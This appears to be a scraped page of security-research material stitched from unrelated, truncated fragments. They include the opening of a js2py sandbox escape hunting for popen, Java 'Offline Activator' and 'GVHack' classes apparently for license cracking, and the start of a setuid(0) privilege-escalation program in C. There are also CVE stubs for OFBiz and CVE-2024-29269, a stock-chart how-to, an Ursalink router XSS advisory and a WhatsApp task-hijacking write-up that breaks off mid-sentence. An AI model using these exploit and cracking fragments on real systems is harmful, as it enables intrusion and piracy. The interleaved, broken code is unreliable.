import js2py
js_code = """
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
How to Use
Compare the performance of a stock across two or more time frames using the Yahoo Finance API and the Matplotlib Python library. Adjust the stock symbol and time frames according to your requirements and save the content in a file named script.py.
import requests
import matplotlib.pyplot as plt
from datetime import datetime
/**
 * Offline Activator [Version 1.0.0 Beta]
 *
 * @author Bipin Jitiya
 * @version 1.0
 * @since 2024-04-24
 */
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
- CVE: CVE-2024-29269
- Severity: Critical
- Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)
File: script.py
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import java.security.Key;
import java.security.MessageDigest;
import java.math.BigInteger;
public class GVHack {
    private static Key generateKey(String paramStr){
- CVE: CVE-2023-51467
- Severity: Critical (CVSS 9.8)
- Root cause: https://github.com/apache/ofbiz-framework/blob/0530a58d3a912520b7f9e46c5ccde98fd3737bf5/framework/webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy#L90
- Mitigation: Upgrade Apache OFBiz
- Reference: https://issues.apache.org/jira/browse/OFBIZ-12873
File: script.py
Download Dependencies
user@hostname:~$ mkdir velocity-engine
user@hostname:~$ cd velocity-engine
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-core-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/velocity-engine-scripting-2.3.jar
user@hostname:~/velocity-engine$ wget https://dlcdn.apache.org/velocity/engine/2.3/spring-velocity-support-2.3.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/slf4j/slf4j-api/2.0.9/slf4j-api-2.0.9.jar
user@hostname:~/velocity-engine$ wget https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.13.0/commons-lang3-3.13.0.jar
user@hostname:~/velocity-engine$ cd ..
user@hostname:~$
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {
Reflected Cross-Site Scripting (XSS) and Absent HttpOnly Flag in Ursalink Industrial Cellular Router Admin Panel Leads to Account Takeover
Reflected Cross-Site Scripting (XSS) and absent HttpOnly flag vulnerabilities in the Ursalink Industrial Cellular Router admin panel could allow remote attackers to execute arbitrary scripts and hijack user sessions, potentially leading to account takeover.
The admin panel does not properly validate and sanitize user input, allowing malicious scripts to be injected into the page's content. The "td" session cookie lacks the HttpOnly flag (and also the Secure flag), so client-side scripts can read it, which leads to session hijacking and unauthorized access. Attackers can steal sensitive information, impersonate users, or perform unauthorized actions.
- Affected Products: UR5X, UR32L, UR32, UR35, UR41; other Industrial Cellular Routers might also be vulnerable.
Around a year ago, I discovered a long-standing vulnerability in WhatsApp and other popular Android applications. Despite its existence for years, this vulnerability remained largely theoretical. To demonstrate its real-world impact, I successfully exploited it in WhatsApp, Facebook, and Facebook Lite. I promptly reported my findings to Facebook's Whitehat program. In this post, I'll share the details I provided to Facebook.
Don't want to read? Skip the technical details and watch the demo video here: https://youtu.be/1p3tehj3aUQ
While reviewing the WhatsApp Android application we have identified a misconfiguration in AndroidManifest.xml related to task control features. This misconfiguration leads to a critical vulnerability called task hijacking and enables the attack flow against the latest WhatsApp in Android-based phones.
In successful exploitation of the vulnerability, the malicious